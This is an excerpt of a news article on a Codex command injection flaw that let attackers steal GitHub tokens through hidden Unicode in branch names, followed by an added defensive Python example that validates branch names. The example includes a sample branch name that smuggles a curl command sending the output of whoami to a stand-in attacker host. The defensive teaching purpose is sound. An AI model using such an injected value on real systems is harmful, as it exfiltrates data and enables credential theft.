OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens
hackread.com
BeyondTrust Phantom Labs researchers have revealed a critical command injection vulnerability in OpenAI’s Codex. The flaw allowed attackers to steal sensitive GitHub OAuth tokens using hidden Unicode characters in branch names, potentially compromising entire enterprise environments.
A significant security vulnerability has been identified in OpenAI’s Codex, a coding assistant used by many developers to help write and review code. The flaw could have allowed attackers to steal GitHub OAuth access tokens, the credentials that grant whoever holds them the same access to a person’s or a company’s private code repositories as the developer they were issued to.
These findings come from researchers at BeyondTrust Phantom Labs, who found that a simple lack of input sanitization could turn a coding assistant into a potential doorway for data theft.
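The excerpt describes the class of flaw (a branch name reaching a shell without sanitization, with hidden Unicode characters making it look benign) but not Codex’s actual code path or the researchers’ payload. The following Python is an added example and not code from the page, OpenAI or Phantom Labs; the function names, the allowlist regex and the two sample branch names are constructed here to show the general pattern: detect characters a UI would not render, validate the name against an allowlist, and never splice it into a string a shell will parse.

```python
import re
import unicodedata

# Unicode general categories that have no business in a branch name typed by a human:
# Cf = format (zero-width space/joiner, BOM, bidi overrides), Cc = control codes,
# Co = private use, Cn = unassigned, Cs = surrogates, Zl/Zp = line/paragraph separators.
HIDDEN_CATEGORIES = {"Cf", "Cc", "Co", "Cn", "Cs", "Zl", "Zp"}

# Allowlist for the refs this (hypothetical) tool is willing to handle. Git accepts far
# more than this, but a tool that forwards the name to other programs should accept only
# what it needs. The first character must be alphanumeric, so a name never parses as an
# option such as "--output".
SAFE_REF = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]*$")


def find_hidden_chars(name):
    """Return (index, 'U+XXXX', category, Unicode name) for each invisible/format char."""
    found = []
    for i, ch in enumerate(name):
        cat = unicodedata.category(ch)
        if cat in HIDDEN_CATEGORIES:
            found.append((i, f"U+{ord(ch):04X}", cat, unicodedata.name(ch, "<unnamed>")))
    return found


def visible_form(name):
    """Approximate what a terminal or web UI renders: the name with hidden chars dropped."""
    return "".join(ch for ch in name if unicodedata.category(ch) not in HIDDEN_CATEGORIES)


def validate_branch_name(name):
    """Reject names carrying hidden characters, shell metacharacters or git-ref hazards."""
    hidden = find_hidden_chars(name)
    if hidden:
        raise ValueError(f"hidden characters in branch name {visible_form(name)!r}: {hidden}")
    if not SAFE_REF.match(name):
        raise ValueError(f"disallowed characters in branch name: {name!r}")
    # Subset of git's own ref rules (see git check-ref-format) the regex does not cover.
    if ".." in name or "//" in name or name.endswith(("/", ".", ".lock")):
        raise ValueError(f"branch name violates git ref rules: {name!r}")
    return name


def checkout_command_unsafe(name):
    """Vulnerable pattern: the raw name is spliced into a string a shell will parse.
    Anything after ';' or inside '$(...)' runs with the tool's privileges and its token."""
    return f"git checkout {name}"


def checkout_command_safe(name):
    """Hardened pattern: validate first, then build an argv list to hand to
    subprocess.run(argv) with shell=False, so no shell ever parses the name."""
    return ["git", "checkout", validate_branch_name(name)]


# Constructed samples (not the researchers' payload): a look-alike of 'main' carrying a
# zero-width space, and a name that smuggles a second command past string interpolation.
LOOKALIKE = "main\u200b"
INJECTION = "fix-1; curl https://attacker.example/?u=$(whoami)"


def triage(name):
    """Summarise how the unsafe and safe patterns handle one name; returns a dict."""
    try:
        safe = checkout_command_safe(name)
        verdict = "accepted"
    except ValueError as exc:
        safe, verdict = None, f"rejected: {exc}"
    return {
        "rendered_as": visible_form(name),
        "hidden_chars": find_hidden_chars(name),
        "unsafe_shell_string": checkout_command_unsafe(name),
        "safe_argv": safe,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for sample in ("feature/login-42", LOOKALIKE, INJECTION):
        for key, value in triage(sample).items():
            print(f"{key:>20}: {value}")
        print()
```

Running the file triages the three samples: the benign name is accepted into an argv list, the look-alike is rejected because of the U+200B it carries even though it renders as "main", and the injection sample is rejected by the allowlist. The regex is deliberately stricter than git’s own ref rules; widen it only for characters the tool actually needs, and keep the argv list with shell=False regardless.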
The Invisible Branch Trick
Tools like Codex need a GitHub token to access a developer’s repositories on their behalf. Phantom Labs researchers discovered the system failed to properly ...
Copyright of this story belongs solely to hackread.com, where the full text is available.

